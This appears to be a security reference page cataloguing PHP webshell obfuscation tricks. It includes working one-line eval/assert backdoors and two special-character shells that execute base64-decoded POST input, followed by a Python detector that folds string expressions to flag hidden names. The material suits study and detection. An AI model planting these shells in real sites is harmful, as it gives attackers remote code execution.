WebShell
================================

Common Variants
--------------------------------
- GLOBALS
    - ``eval($GLOBALS['_POST']['op']);``
- ``$_FILE``
    - ``eval($_FILE['name']);``
- String splitting
    - ``assert(${"_PO"."ST"} ['sz']);``
- Dynamic function execution
    - ``$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);``
- create_function
    - ``$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();``
- preg_replace
- rot13
- base64
- Numeric escapes (hex/octal)
    - ``"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"``
- Using the file name
    - ``__FILE__``

Special-Character Shells
--------------------------------
PHP applies the XOR and increment operators directly to strings, so a shell can be built entirely from special characters.

::

    @$_++;
    // each XOR pair yields one character; $__ becomes "_POST"
    $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
    @${$__}[!$_](${$__}[$_]);

::

    $_=[];
    $_=@"$_"; // $_='Array';
    $_=$_['!'=='@']; // $_=$_[0];
    // $___ is built up to "ASSERT" by incrementing the letter 'A'
    $___=$_; // A
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
    $___.=$__; // S
    $___.=$__; // S
    $__=$_;
    $__++;$__++;$__++;$__++; // E
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $___.=$__;

    // $____ is built up to "_POST" the same way
    $____='_';
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $____.=$__;

    $_=$$____;
    $___(base64_decode($_[_]));
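
A defender-side check for the literal-based variants above (splitting, ``strrev``, numeric escapes, XOR), added here as an example and not part of the original page: it folds constant string expressions in PHP source and reports watchlist names that only appear after folding. The watchlist, the function names and the ``«»`` marker are assumptions of this example; the increment-built shell needs a different signal and is not covered.

```python
import re

# Assumed watchlist; extend it for your own environment.
SENSITIVE = ("eval", "assert", "base64_decode", "create_function", "_POST", "_GET")
LIT = re.compile(r'"((?:[^"\\]|\\.)*)"' r"|'((?:[^'\\]|\\.)*)'")
ESC = re.compile(r'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))')
TOK = r'«([^«»]*)»'  # marker for a decoded literal; assumes « » never occur in the input

def _lit(m):
    """Rewrite one PHP literal as «text»; \\xHH and \\NNN only apply in double quotes."""
    if m.group(1) is None:
        return '«' + m.group(2) + '»'
    byte = lambda e: chr(int(e.group(1), 16) if e.group(1) else int(e.group(2), 8) & 0xFF)
    return '«' + ESC.sub(byte, m.group(1)) + '»'

def _xor(m):
    # PHP XORs strings byte by byte and truncates to the shorter operand.
    return '«' + ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(m.group(1), m.group(2))) + '»'

# Tried in order, restarting after every change, so '.' folds before '^' as in PHP.
RULES = [
    (re.compile(r'strrev\s*\(\s*' + TOK + r'\s*\)', re.I), lambda m: '«' + m.group(1)[::-1] + '»'),
    (re.compile(TOK + r'\s*\.\s*' + TOK), lambda m: '«' + m.group(1) + m.group(2) + '»'),
    (re.compile(TOK + r'\s*\^\s*' + TOK), _xor),
    (re.compile(r'(?<!\w)\(\s*(' + TOK + r')\s*\)'), lambda m: m.group(1)),
]

def fold(src):
    """Fold literal-only expressions to a fixed point and return the literal values."""
    text = LIT.sub(_lit, src)
    while True:
        for rx, fn in RULES:
            new = rx.sub(fn, text)
            if new != text:
                text = new
                break
        else:
            return re.findall(TOK, text)

def hidden_names(src):
    """Watchlist names that exist only after folding, i.e. that a plain grep misses."""
    folded = ' '.join(fold(src)).lower()
    return sorted(n for n in SENSITIVE if n.lower() in folded and n.lower() not in src.lower())

SAMPLES = {  # variants quoted on this page, held as inert strings and never executed
    "split": r'''$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);''',
    "escapes": r'"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"',
    "xor": r'''$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");''',
}
```

Run ``hidden_names`` over each file in the web root and treat any non-empty result as a lead for manual review, since a legitimate file rarely needs to assemble these names from fragments.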